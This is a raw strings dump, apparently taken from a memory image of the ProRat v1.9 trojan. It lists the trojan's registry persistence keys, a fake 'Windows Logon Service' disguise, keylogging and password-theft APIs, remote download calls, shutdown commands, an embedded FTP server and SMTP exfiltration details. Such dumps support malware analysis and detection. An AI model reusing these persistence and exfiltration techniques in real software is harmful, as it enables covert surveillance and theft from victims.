Pplugin10xa.exe /stext
winp9.exe
winp9.exe /stext
eimsn.exe
winrar.exe
Software\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
\services.exe
Windows services
Windows Logon Service
Online_List_atm=iuuq;..vvv/xntsrhud/bnl.bfh,cho.qsns`u/bfh
Port_atm=4001
SOFTWARE\Microsoft\Windows\CurrentVersion\policies\Explorer\Run
SOFTWARE\Microsoft\Active Setup\Installed Components\{5Y99AE78-58TT-11dW-BE53-Y67078979Y}\
SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon
shutdown.exe -s -t 00
shutdown.exe -r -t 00
shutdown.exe -l
\refresh.scf
CONTROL.EXE desk.cpl
CONTROL.EXE hdwwiz.cpl
CONTROL.EXE inetcpl.cpl
CONTROL.EXE appwiz.cpl
CONTROL.EXE intl.cpl
CONTROL.EXE joy.cpl
CONTROL.EXE access.cpl
CONTROL.EXE main.cpl
CONTROL.EXE ncpa.cpl
CONTROL.EXE nusrmgr.cpl
CONTROL.EXE timedate.cpl
CONTROL.EXE mmsys.cpl
CONTROL.EXE powercfg.cpl
CONTROL.EXE sysdm.cpl
CONTROL.EXE telephon.cpl
CONTROL.EXE odbccp32.cpl
\SOFTWARE\Microsoft\Internet Explorer\TypedURLs
////////// URL HISTORY //////////
url10
url11
url12
url13
url14
url15
url16
url17
url18
url19
url20
url21
url22
url23
url24
url25
00010pPassword Decrypt Error!
SMTP
\ICQ\Icq.exe
\Messenger\msmsgs.exe
\MSN Messenger\msnmsgr.exe
\Yahoo!\Messenger\YPager.exe
\Outlook Express\msimn.exe
\GlobalSCAPE\CuteFTP\cutftp32.exe
\NetMeeting\conf.exe
notepad.exe
mspaint.exe
wordpad.exe
calc.exe
\WinZip\WINZIP32.EXE
\WinRAR\WinRAR.exe
cmd.exe
command.com
\Internet Explorer\IEXPLORE.EXE
wmplayer.exe
\Winamp\winamp.exe
\Real\RealOne Player\realplay.exe
\QuickTime\QuickTimePlayer.exe
\Movie Maker\moviemk.exe
\FlashGet\flashget.exe
_ReadCdKeys
&serverportu=
HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1)
ProRat@Yahoo.Com
<ProRat@Yahoo.Com>
FtpServer1
FtpServer2
SmtpCli1
FtpServer1Authenticate
FtpServer2Authenticate
FormKeyDown
SmtpCli1RequestDone
FtpServer1ChangeDirectory
Memo2KeyDown
xxtype.cpp
derv->tpClass.tpcFlags & CF_HAS_BASES
Inappropriate I/O control operation
Broken pipe
Operation not permitted
%H:%M:%S
%m/%d/%y
%A, %B %d, %Y
d/d/d d:d:d.d
xx.cpp
varType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpClass.tpcDtorAddr
(errPtr->ERRcInitDtc >= varType->tpClass.tpcDtorCount) || flags
memType->tpClass.tpcFlags & CF_HAS_DTOR
varType->tpArr.tpaElemType->tpClass.tpcFlags & CF_HAS_DTOR
dttPtr->dttType->tpPtr.tppBaseType->tpClass.tpcFlags & CF_HAS_DTOR
IS_CLASS(dttPtr->dttType->tpMask) && (dttPtr->dttType->tpClass.tpcFlags & CF_HAS_DTOR)
elemType->tpClass.tpcFlags & CF_HAS_DTOR
C:\Windows\
Project1.exe
@$xp$16Ftpsrv@FtpSrv__3
@$xp$17Ftpsrv@TFtpServer
@$xp$17Ftpsrv@TFtpString
@$xp$17Smtpprot@TSmtpCli
@$xp$17Smtpprot@TSmtpFct
@$xp$18Ftpsrvc@TFtpOption
@$xp$19Ftpsrvc@TFtpCmdType
@$xp$19Ftpsrvc@TFtpOptions
@$xp$19Smtpprot@TSmtpState
@$xp$20Smtpprot@TSmtpFctSet
@$xp$21Ftpsrvc@TCommandEvent
@$xp$21Ftpsrvc@TDisplayEvent
@$xp$21Ftpsrvc@TFtpCtrlState
@$xp$21Smtpprot@TSmtpDisplay
@$xp$21Smtpprot@TSmtpRequest
@$xp$21Smtpprot@TSyncSmtpCli
@$xp$22Ftpsrvc@TFtpCtrlSocket
@$xp$22Smtpprot@SmtpException
@$xp$22Smtpprot@TSmtpNextProc
@$xp$25Ftpsrv@FtpServerException
@$xp$25Ftpsrv@TFtpSrvCommandProc
@$xp$25Smtpprot@TSmtpContentType
@$xp$25Smtpprot@TSmtpRequestDone
@$xp$26Ftpsrv@TFtpCtrlSocketClass
@$xp$26Smtpprot@TCustomSmtpClient
@$xp$26Smtpprot@TSmtpAttachHeader
@$xp$26Smtpprot@TSmtpGetDataEvent
@$xp$29Smtpprot@TSmtpHeaderLineEvent
@$xp$30Ftpsrv@TFtpSrvCommandTableItem
@$xp$31Ftpsrv@TFtpSrvAuthenticateEvent
@$xp$31Ftpsrv@TFtpSrvRetrDataSentEvent
@$xp$31Ftpsrv@TFtpSrvValidateXferEvent
@$xp$31Ftpsrvc@EFtpCtrlSocketException
@$xp$32Ftpsrv@TFtpSrvClientCommandEvent
@$xp$32Ftpsrv@TFtpSrvClientConnectEvent
@$xp$32Ftpsrv@TFtpSrvDataAvailableEvent
@$xp$32Smtpprot@TSmtpProcessHeaderEvent
@$xp$33Ftpsrv@TFtpSrvAnswerToClientEvent
@$xp$33Ftpsrv@TFtpSrvBuildDirectoryEvent
@$xp$34Ftpsrv@TFtpSrvChangeDirectoryEvent
@$xp$35Smtpprot@TSmtpAttachmentContentType
@$xp$39Ftpsrv@TFtpSrvDataSessionConnectedEvent
@Ftpsrv@CopyRight
@Ftpsrv@Finalization$qqrv
@Ftpsrv@FtpServerException@
@Ftpsrv@Register$qqrv
@Ftpsrv@TFtpServer@
@Ftpsrv@TFtpServer@$bctr$qqrp18Classes@TComponent
@Ftpsrv@TFtpServer@$bdtr$qqrv
@Ftpsrv@TFtpServer@AddCommand$qqrx17System@AnsiStringxynpqqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2$v
@Ftpsrv@TFtpServer@BuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%p15Classes@TStreamo
@Ftpsrv@TFtpServer@ClientCommand$qqrp14System@TObjectpci
@Ftpsrv@TFtpServer@ClientDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientPassiveSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrDataSent$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientRetrSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorDataAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionClosed$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ClientStorSessionConnected$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@CommandABOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandAPPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCDUP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandCWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandChangeDir$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDELE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2o
@Ftpsrv@TFtpServer@CommandLIST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMDTM$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandMKD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNLST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandNOOP$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASS$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPASV$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPORT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandQUIT$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandREST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRETR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRMD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNFR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandRNTO$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSIZE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTOR$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSTRU$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandSYST$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandTYPE$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandUSER$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@CommandXPWD$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@DisconnectAll$qqrv
@Ftpsrv@TFtpServer@GetActive$qqrv
@Ftpsrv@TFtpServer@GetClientCount$qqrv
@Ftpsrv@TFtpServer@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Ftpsrv@TFtpServer@SendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@SendNextDataChunk$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocket
@Ftpsrv@TFtpServer@ServSocketSessionAvailable$qqrp14System@TObjectus
@Ftpsrv@TFtpServer@ServSocketStateChange$qqrp14System@TObject20Wsocket@TSocketStatet2
@Ftpsrv@TFtpServer@SetActive$qqro
@Ftpsrv@TFtpServer@Start$qqrv
@Ftpsrv@TFtpServer@StartSendData$qqrp22Ftpsrvc@TFtpCtrlSocket
@Ftpsrv@TFtpServer@Stop$qqrv
@Ftpsrv@TFtpServer@TriggerAlterDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerAuthenticate$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringt2ro
@Ftpsrv@TFtpServer@TriggerBuildDirectory$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%o
@Ftpsrv@TFtpServer@TriggerChangeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerClientCommand$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%t2t2
@Ftpsrv@TFtpServer@TriggerClientConnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerClientDisconnect$qqrp22Ftpsrvc@TFtpCtrlSocketus
@Ftpsrv@TFtpServer@TriggerMakeDirectory$qqrp22Ftpsrvc@TFtpCtrlSocket17System@AnsiStringro
@Ftpsrv@TFtpServer@TriggerRetrDataSent$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerRetrSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerSendAnswer$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%
@Ftpsrv@TFtpServer@TriggerServerStart$qqrv
@Ftpsrv@TFtpServer@TriggerServerStop$qqrv
@Ftpsrv@TFtpServer@TriggerStorDataAvailable$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketpcius
@Ftpsrv@TFtpServer@TriggerStorSessionClosed$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerStorSessionConnected$qqrp22Ftpsrvc@TFtpCtrlSocketp16Wsocket@TWSocketus
@Ftpsrv@TFtpServer@TriggerValidateDele$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateGet$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidatePut$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnFr$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@TriggerValidateRnTo$qqrp22Ftpsrvc@TFtpCtrlSocketr28System@%SmallString$iuc$255%ro
@Ftpsrv@TFtpServer@WMFtpSrvAbortTransfer$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvClientClosed$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseData$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WMFtpSrvCloseRequest$qqrr17Messages@TMessage
@Ftpsrv@TFtpServer@WndProc$qqrr17Messages@TMessage
@Ftpsrv@initialization$qqrv
@Ftpsrvc@CopyRight
@Ftpsrvc@EFtpCtrlSocketException@
@Ftpsrvc@Finalization$qqrv
@Ftpsrvc@IsUNC$qqr17System@AnsiString
@Ftpsrvc@PatchIE5$qqrr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@
@Ftpsrvc@TFtpCtrlSocket@$bctr$qqrp18Classes@TComponent
@Ftpsrvc@TFtpCtrlSocket@$bdtr$qqrv
@Ftpsrvc@TFtpCtrlSocket@Dup$qqri
@Ftpsrvc@TFtpCtrlSocket@GetPeerAddr$qqrv
@Ftpsrvc@TFtpCtrlSocket@SendAnswer$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetAbortingTransfer$qqro
@Ftpsrvc@TFtpCtrlSocket@SetDirectory$qqr17System@AnsiString
@Ftpsrvc@TFtpCtrlSocket@SetRcvSize$qqri
@Ftpsrvc@TFtpCtrlSocket@StartConnection$qqrv
@Ftpsrvc@TFtpCtrlSocket@TriggerCommand$qqrpci
@Ftpsrvc@TFtpCtrlSocket@TriggerDataAvailable$qqrus
@Ftpsrvc@TFtpCtrlSocket@TriggerSessionConnected$qqrus
@Ftpsrvc@initialization$qqrv
@Ftpsrvt@CopyRight
@Ftpsrvt@FileUtcStr$qqr17System@AnsiString
@Ftpsrvt@Finalization$qqrv
@Ftpsrvt@initialization$qqrv
@Smtpprot@CopyRight
@Smtpprot@Finalization$qqrv
@Smtpprot@Register$qqrv
@Smtpprot@Rfc822DateTime$qqr16System@TDateTime
@Smtpprot@SmtpException@
@Smtpprot@TCustomSmtpClient@
@Smtpprot@TCustomSmtpClient@$bctr$qqrp18Classes@TComponent
@Smtpprot@TCustomSmtpClient@$bdtr$qqrv
@Smtpprot@TCustomSmtpClient@Abort$qqrv
@Smtpprot@TCustomSmtpClient@CheckReady$qqrv
@Smtpprot@TCustomSmtpClient@ClearErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@Connect$qqrv
@Smtpprot@TCustomSmtpClient@Data$qqrv
@Smtpprot@TCustomSmtpClient@DataNext$qqrv
@Smtpprot@TCustomSmtpClient@DisplayLastResponse$qqrv
@Smtpprot@TCustomSmtpClient@DoHighLevelAsync$qqrv
@Smtpprot@TCustomSmtpClient@DoUUEncode$qqrrpvr17System@AnsiStringro
@Smtpprot@TCustomSmtpClient@EndUUEncode$qqrrpv
@Smtpprot@TCustomSmtpClient@ExecAsync$qqr21Smtpprot@TSmtpRequest17System@AnsiStringpxusxiynpqqrv$v
@Smtpprot@TCustomSmtpClient@Helo$qqrv
@Smtpprot@TCustomSmtpClient@HighLevelAsync$qqr21Smtpprot@TSmtpRequest45System@%Set$t17Smtpprot@TSmtpFct$iuc$0$iuc$8%
@Smtpprot@TCustomSmtpClient@InitUUEncode$qqrrpv17System@AnsiString
@Smtpprot@TCustomSmtpClient@Mail$qqrv
@Smtpprot@TCustomSmtpClient@MailFrom$qqrv
@Smtpprot@TCustomSmtpClient@NextExecAsync$qqrv
@Smtpprot@TCustomSmtpClient@Open$qqrv
@Smtpprot@TCustomSmtpClient@Quit$qqrv
@Smtpprot@TCustomSmtpClient@RcptTo$qqrv
@Smtpprot@TCustomSmtpClient@RcptToDone$qqrv
@Smtpprot@TCustomSmtpClient@RcptToNext$qqrv
@Smtpprot@TCustomSmtpClient@Rset$qqrv
@Smtpprot@TCustomSmtpClient@SendCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@SetContentType$qqr25Smtpprot@TSmtpContentType
@Smtpprot@TCustomSmtpClient@SetErrorMessage$qqrv
@Smtpprot@TCustomSmtpClient@SetMailMessage$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@SetRcptName$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@StateChange$qqr19Smtpprot@TSmtpState
@Smtpprot@TCustomSmtpClient@TriggerCommand$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerDisplay$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerGetData$qqripciro
@Smtpprot@TCustomSmtpClient@TriggerHeaderLine$qqrpci
@Smtpprot@TCustomSmtpClient@TriggerProcessHeader$qqrp16Classes@TStrings
@Smtpprot@TCustomSmtpClient@TriggerRequestDone$qqrus
@Smtpprot@TCustomSmtpClient@TriggerResponse$qqr17System@AnsiString
@Smtpprot@TCustomSmtpClient@TriggerSessionClosed$qqrus
@Smtpprot@TCustomSmtpClient@TriggerSessionConnected$qqrus
@Smtpprot@TCustomSmtpClient@TriggerStateChange$qqrv
@Smtpprot@TCustomSmtpClient@Vrfy$qqrv
@Smtpprot@TCustomSmtpClient@WMSmtpRequestDone$qqrr17Messages@TMessage
@Smtpprot@TCustomSmtpClient@WSocketDataAvailable$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDataSent$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketDnsLookupDone$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionClosed$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WSocketSessionConnected$qqrp14System@TObjectus
@Smtpprot@TCustomSmtpClient@WndProc$qqrr17Messages@TMessage
@Smtpprot@TSmtpCli@
@Smtpprot@TSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSmtpCli@$bdtr$qqrv
@Smtpprot@TSmtpCli@Data$qqrv
@Smtpprot@TSmtpCli@PrepareEMail$qqrv
@Smtpprot@TSmtpCli@SetEMailFiles$qqrp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerAttachContentType$qqrir17System@AnsiStringt2
@Smtpprot@TSmtpCli@TriggerAttachHeader$qqri17System@AnsiStringp16Classes@TStrings
@Smtpprot@TSmtpCli@TriggerGetData$qqripciro
@Smtpprot@TSmtpCli@TriggerHeaderLine$qqrpci
@Smtpprot@TSyncSmtpCli@
@Smtpprot@TSyncSmtpCli@$bctr$qqrp18Classes@TComponent
@Smtpprot@TSyncSmtpCli@AbortSync$qqrv
@Smtpprot@TSyncSmtpCli@ConnectSync$qqrv
@Smtpprot@TSyncSmtpCli@DataSync$qqrv
@Smtpprot@TSyncSmtpCli@HeloSync$qqrv
@Smtpprot@TSyncSmtpCli@MailFromSync$qqrv
@Smtpprot@TSyncSmtpCli@MailSync$qqrv
@Smtpprot@TSyncSmtpCli@OpenSync$qqrv
@Smtpprot@TSyncSmtpCli@QuitSync$qqrv
@Smtpprot@TSyncSmtpCli@RcptToSync$qqrv
@Smtpprot@TSyncSmtpCli@RsetSync$qqrv
@Smtpprot@TSyncSmtpCli@Synchronize$qqrynpqqrv$v
@Smtpprot@TSyncSmtpCli@VrfySync$qqrv
@Smtpprot@TSyncSmtpCli@WaitUntilReady$qqrv
@Smtpprot@initialization$qqrv
@Wsocket@TCustomSocksWSocket@SetSocksPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@GetPeerPort$qqrv
@Wsocket@TCustomWSocket@GetRemotePort$qqrv
@Wsocket@TCustomWSocket@GetXPort$qqrv
@Wsocket@TCustomWSocket@Notification$qqrp18Classes@TComponent18Classes@TOperation
@Wsocket@TCustomWSocket@SetLocalPort$qqr17System@AnsiString
@Wsocket@TCustomWSocket@SetRemotePort$qqr17System@AnsiString
@Wsocket@WSocketResolvePort$qqr17System@AnsiStringt1
Font.Charset
Font.Color
Font.Height
Font.Name
Font.Style
220 Welcom to ProRat Ftp Server
WindowState
CreatePipe
GetProcessHeap
WinExec
RegCloseKey
RegCreateKeyExA
RegDeleteKeyA
RegEnumKeyExA
RegFlushKey
RegOpenKeyExA
RegQueryInfoKeyA
SetViewportOrgEx
ShellExecuteA
URLDownloadToFileA
ActivateKeyboardLayout
EnumThreadWindows
EnumWindows
ExitWindowsEx
GetKeyNameTextA
GetKeyState
GetKeyboardLayout
GetKeyboardLayoutList
GetKeyboardType
LoadKeyboardLayoutA
MapVirtualKeyA
MsgWaitForMultipleObjects
keybd_event
`.data
P.idata
@.edata
@.rsrc
@.reloc
KERNEL32.DLL
ADVAPI32.DLL
AVICAP32.DLL
COMCTL32.DLL
GDI32.DLL
OLE32.DLL
OLEAUT32.DLL
SHELL32.DLL
URLMON.DLL
WINMM.DLL
WINSPOOL.DRV
WS2_32.DLL
WSOCK32.DLL
JPEG error #%d

services.exe_1588_rwx_00401000_001F9000:




Port
LocalPort
PeerPort
SocksPort
SocksPassword
wsock32.dll
Unable to load wsock32.dll Error #
%s: WSAStartup error #%d
0.0.0.0
Cannot change Port if not closed
Cannot change LocalPort if not closed
255.255.255.255
WSocketResolveHost: Cannot convert host address '%s', Error #%d
WSocketResolvePort: Invalid Port.
WSocketResolvePort: Cannot convert port '%s', Error #%d
WSocketResolveProto: Cannot convert protocol '%s', Error #%d
GetPeerPort
%s: can't start DNS lookup, error #%d
winsock.bind failed, error #%d
winsock.getsockname failed, error #%d
Connect: No Port Specified
listen: port not assigned
Winsock.GetHostName failed
Operation would block
Operation now in progress
Operation already in progress
Socket operation on non-socket
Protocol not supported
Socket type not supported
Operation not supported on socket
Protocol family not supported
Address family not supported by protocol family
WinSock DLL cannot support this application
Can't change socks port if not closed
Listening is not supported thru socks server
tcp is the only protocol supported thru socks server
Uh.xC
0.0.0.1
command not supported
address type not supported
TFtpString
TFtpServer (c) 1998-2000 F. Piette V1.08
FtpServerException
FtpSrv
TFtpSrvAuthenticateEvent
TFtpCtrlSocket
Password
TFtpSrvChangeDirectoryEvent
TFtpSrvBuildDirectoryEvent
TFtpSrvClientConnectEvent
TFtpSrvDataSessionConnectedEvent
TFtpSrvClientCommandEvent
Keyword
TFtpSrvAnswerToClientEvent
TFtpString@
TFtpSrvValidateXferEvent
TFtpSrvDataAvailableEvent
TFtpSrvRetrDataSentEvent
TFtpSrvCommandProc
TFtpSrvCommandTableItem
TFtpServer
220 ICS FTP Server ready.
PORT
500 '%s': command not understood.
331 Password required for %s.
503 Login with USER first.
230 User %s logged in.
530 Login incorrect.
$530 Please login with USER and PASS.
250 CWD command successful. "%s" is current directory.
501 CWD failed. %s
257 "%s" is current directory.
200 Port command successful.
501 Invalid PORT command.
150 Opening data connection for %s.
501 Cannot STOR. %s
ftp-data
426 Connection closed; %s.
426 Connection closed; transfer aborted. Error #%d
501 Cannot RETR. %s
451 Failed: %s.
1 ftp ftp
%s %2.2d
200 Type set to %s.
500 'TYPE %s': command not understood.
250 File '%s' deleted.
450 File '%s' can't be deleted.
550 '%s': no such file or directory.
213 %d
550 Command failed: %s.
350 REST supported. Ready to resume at byte offset %d.
501 Syntax error in parameter: %s.
553 '%s': file already exists.
250 File '%s' renamed to '%s'.
450 File '%s' can't be renamed.
200 Ok. Parameter was '%s'.
550 '%s': can't create directory.
550 '%s': file or directory already exists.
257 '%s': directory created.
150 APPE supported. Ready to append file "%s" at offset %d.
200 Ok. STRU parameter '%s' ignored.
550 '%s': no such directory.
250 '%s': directory removed.
550 '%s': can't remove directory.
227 Entering Passive Mode (127,0,0,1,%d,%d).
227 Entering Passive Mode (%d,%d,%d,%d,%d,%d).
500 PASV exception: '%s'.
213 %s
550 %s
SMTP component (c) 1997-2000 F. Piette V2.17
SmtpException
SmtpProt
TSmtpState
smtpReady
smtpDnsLookup
smtpConnecting
smtpConnected
smtpInternalReady
smtpWaitingBanner
smtpWaitingResponse
smtpAbort
TSmtpRequest
smtpConnect
smtpHelo
smtpMailFrom
smtpVrfy
smtpRcptTo
smtpData
smtpQuit
smtpRset
smtpOpen
smtpMail
smtpCustom
TSmtpFct
smtpFctNone
smtpFctHelo
smtpFctConnect
smtpFctMailFrom
smtpFctRcptTo
smtpFctData
smtpFctVrfy
smtpFctQuit
smtpFctRset
TSmtpFctSet
TSmtpContentType
smtpHTML
smtpPlainText
TSmtpDisplay
TSmtpHeaderLineEvent
TSmtpProcessHeaderEvent
TSmtpGetDataEvent
MsgLine
TSmtpRequestDone
TSmtpAttachmentContentType
TSmtpAttachHeader
TSmtpNextProc
TCustomSmtpClient
TSmtpCli
TSmtpClid
OnProcessHeader8
TSyncSmtpCli
smtp
SMTP component not ready
SMTP component not connected
SMTP component already connected
426 Operation aborted.
FtpSrvT (c) 1999-2000 F. Piette V1.02
TFtpCtrlSocket (c) 1998-2000 F. Piette V1.06
EFtpCtrlSocketException`_D
EFtpCtrlSocketExceptionD_D
FtpSrvC
TFtpCtrlState
ftpcInvalid
ftpcWaitingUserCode
ftpcWaitingPassword
ftpcReady
ftpcWaitingAnswer
TFtpCmdType
ftpcPORT
ftpcSTOR
ftpcRETR
ftpcCWD
ftpcXPWD
ftpcPWD
ftpcUSER
ftpcPASS
ftpcLIST
ftpcRMD
ftpcTYPE
ftpcSYST
ftpcQUIT
ftpcDELE
ftpcRNFR
ftpcMKD
ftpcRNTO
ftpcNOOP
ftpcNLST
ftpcABOR
ftpcCDUP
ftpcSIZE
ftpcREST
ftpcAPPE
ftpcSTRU
ftpcMDTM
TFtpOption
ftpcUNC
TFtpOptions
CmdBuf
CmdLen
FtpState
PassWordT
220-ICS FTP Server ready
ssHorizontal
OnKeyDown
OnKeyPress
OnKeyUp
windows
AutoHotkeysd2E
AutoHotkeys
:].tJ
EInvalidGraphicOperation
KeyPreview
WindowStated4E
ssHotTrack
TWindowState
poProportional
TWMKey
System\CurrentControlSet\Control\Keyboard Layouts\%.8x
vcltest3.dll
TDragOperation
TKeyEvent
TKeyPressEvent
crSQLWait
%s (%s)
IMM32.DLL
EInvalidOperation
%s[%d]
%s_%d
USER32.DLL
comctl32.dll
MSWHEEL_ROLLMSG
MSH_WHEELSUPPORT_MSG
MSH_SCROLL_LINES_MSG
kernel32.dll
Portions Copyright (c) 1983,99 Borland
%u8F3
iphlpapi.dll
user32.dll
The procedure entry point %s could not be located in the dynamic link library %s
The ordinal %u could not be located in the dynamic link library %s
advapi32.dll
shell32.dll
.text
.rdata
.data
.rsrc
.reloc
.aspack
.adata
>%U:f{
MFC42.DLL
MSVCRT.dll
GetWindowsDirectoryA
KERNEL32.dll
GetKeyboardState
SetWindowsHookExA
UnhookWindowsHookEx
USER32.dll
hodll.dll
mfc42.dll
msvcrt.dll
`.rdata
@.data
.HookSec
B[ ProRat v1.9 Trojan Horse - Coded by PRO Group - Made in Turkey ]
GetCPInfo
TESTDLL.dll
RegEnumKeyW
Advapi32.dll
NTDLL.DLL
Windows services
{5Y99AE78-58TT-11dW-BE53-Y67078979Y}
0'04090?0
TCP[R[P;PMP
TCMD@TG;PMP
SFTC &úWLW;PMP
CESB&%F;PMP
151.164.23.201
aku.edu.tr
atauni.edu.tr
ege.edu.tr
ankara.edu.tr
192.168.0.1
HKEY_CLASSES_ROOT
HKEY_CURRENT_USER
HKEY_LOCAL_MACHINE
HKEY_USERS
HKEY_CURRENT_CONFIG
